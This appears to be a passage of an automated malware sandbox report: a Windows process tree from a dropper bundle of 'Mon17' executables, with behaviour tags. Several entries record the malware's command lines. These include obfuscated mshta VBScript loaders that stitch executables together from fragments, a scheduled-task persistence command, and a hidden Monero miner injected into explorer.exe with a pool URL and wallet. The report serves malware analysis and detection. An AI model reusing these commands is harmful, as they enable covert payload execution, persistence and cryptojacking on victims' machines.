- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe4⤵
- Loads dropped DLL
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17870faab0.exeMon17870faab0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe4⤵
- Loads dropped DLL
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon178e7a516181.exeMon178e7a516181.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 12006⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone4⤵
- Loads dropped DLL
PID:576 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon17bffc2992eb3d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bffc2992eb3d.exe" & exit6⤵PID:2600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon17bffc2992eb3d.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe4⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe4⤵
- Loads dropped DLL
PID:328 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon173a360b525.exeMon173a360b525.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1760 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1211786845.exe"6⤵
- Loads dropped DLL
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\1211786845.exe"C:\Users\Admin\AppData\Local\Temp\1211786845.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2348572303.exe"6⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\2348572303.exe"C:\Users\Admin\AppData\Local\Temp\2348572303.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 15606⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2732
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe4⤵
- Loads dropped DLL
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\is-UGM0O.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-UGM0O.tmp\Mon17bbf11fdb575d.tmp" /SL5="$5012E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bbf11fdb575d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bbf11fdb575d.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\is-CMLT8.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-CMLT8.tmp\Mon17bbf11fdb575d.tmp" /SL5="$20172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17bbf11fdb575d.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\is-Q9P12.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-Q9P12.tmp\postback.exe" ss19⤵
- Executes dropped EXE
PID:2776
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe4⤵
- Loads dropped DLL
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1308 -
C:\Users\Admin\Pictures\Adobe Films\4HRNC5d53KWlNBXLCAhwXlp_.exe"C:\Users\Admin\Pictures\Adobe Films\4HRNC5d53KWlNBXLCAhwXlp_.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 15526⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe4⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1727c156c4abcec.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe4⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe4⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe5⤵
- Executes dropped EXE
PID:616
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1708beae021a5ff.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon1708beae021a5ff.exe"5⤵
- Executes dropped EXE
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe4⤵
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon174a6c5f1664f.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe4⤵
- Loads dropped DLL
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon178d8e5d06822.exeMon178d8e5d06822.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Users\Admin\AppData\Roaming\3605476.exe"C:\Users\Admin\AppData\Roaming\3605476.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Users\Admin\AppData\Roaming\3087753.exe"C:\Users\Admin\AppData\Roaming\3087753.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2784
-
-
C:\Users\Admin\AppData\Roaming\663376.exe"C:\Users\Admin\AppData\Roaming\663376.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Users\Admin\AppData\Roaming\2816160.exe"C:\Users\Admin\AppData\Roaming\2816160.exe"8⤵
- Executes dropped EXE
PID:1416 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\2816160.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\2816160.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )9⤵PID:2612
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\2816160.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if ""== "" for %c in ( "C:\Users\Admin\AppData\Roaming\2816160.exe") do taskkill -IM "%~nxc" -f10⤵PID:1644
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "2816160.exe" -f11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x11⤵
- Executes dropped EXE
PID:2316 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if ""/PdmLkTgclA1F1vCuy4x"" == """" for %c in ( ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )12⤵PID:2792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "/PdmLkTgclA1F1vCuy4x"== "" for %c in ( "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe") do taskkill -IM "%~nxc" -f13⤵PID:3288
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPt: clOSE ( creatEoBjecT ( "wScripT.SheLL").rUn ( "CMD /R EchO | sET /P = ""MZ"" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+ jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s " , 0, True))12⤵PID:3424
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EchO | sET /P = "MZ" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo &deL /q *&StArT regsvr32 -u ..\cKW6.mXo -s13⤵PID:3528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>GGEDXaPF.3N"14⤵PID:3592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "14⤵PID:3584
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -u ..\cKW6.mXo -s14⤵PID:3632
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\4257421.exe"C:\Users\Admin\AppData\Roaming\4257421.exe"8⤵
- Executes dropped EXE
PID:2000
-
-
C:\Users\Admin\AppData\Roaming\1002079.exe"C:\Users\Admin\AppData\Roaming\1002079.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:1604 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 9088⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:2292 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:2712
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:1780 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:2668
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:2156
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:3476
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:3240
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"7⤵
- Executes dropped EXE
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2052 -s 16928⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:2008 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:4048
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:4092
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3344
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Executes dropped EXE
PID:3416 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:3872 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:3364
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:3920
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe4⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe4⤵
- Loads dropped DLL
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\7zS4B1FA376\Mon17332e41e6b.exeMon17332e41e6b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Users\Admin\AppData\Roaming\3484752.exe"C:\Users\Admin\AppData\Roaming\3484752.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Users\Admin\AppData\Roaming\4213580.exe"C:\Users\Admin\AppData\Roaming\4213580.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Users\Admin\AppData\Roaming\924123.exe"C:\Users\Admin\AppData\Roaming\924123.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Users\Admin\AppData\Roaming\7862565.exe"C:\Users\Admin\AppData\Roaming\7862565.exe"6⤵
- Executes dropped EXE
PID:2604 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\7862565.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\7862565.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )7⤵PID:1516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\7862565.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if ""== "" for %c in ( "C:\Users\Admin\AppData\Roaming\7862565.exe") do taskkill -IM "%~nxc" -f8⤵PID:1004
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7862565.exe" -f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x9⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if ""/PdmLkTgclA1F1vCuy4x"" == """" for %c in ( ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )10⤵PID:3624
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "/PdmLkTgclA1F1vCuy4x"== "" for %c in ( "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe") do taskkill -IM "%~nxc" -f11⤵PID:3696
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPt: clOSE ( creatEoBjecT ( "wScripT.SheLL").rUn ( "CMD /R EchO | sET /P = ""MZ"" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+ jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s " , 0, True))10⤵PID:3136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EchO | sET /P = "MZ" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo &deL /q *&StArT regsvr32 -u ..\cKW6.mXo -s11⤵PID:2328
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>GGEDXaPF.3N"12⤵PID:3784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "12⤵PID:2228
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -u ..\cKW6.mXo -s12⤵PID:2776
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5959431.exe"C:\Users\Admin\AppData\Roaming\5959431.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1208 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1388
-
-
-
C:\Users\Admin\AppData\Roaming\2436926.exe"C:\Users\Admin\AppData\Roaming\2436926.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {70390347-CCCE-4D82-8A2E-C74F4D928A6F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3780
-
C:\Windows\system32\taskeng.exetaskeng.exe {B57F7211-0428-41E7-96B5-7256B733EA46} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2364
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:3272
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3F2CDB62-AD0A-4E75-BE55-F2C8854C15A3} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1636
-
C:\Windows\system32\taskeng.exetaskeng.exe {E734DBB8-10D9-46D0-9F2B-B965BB974710} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3416
-
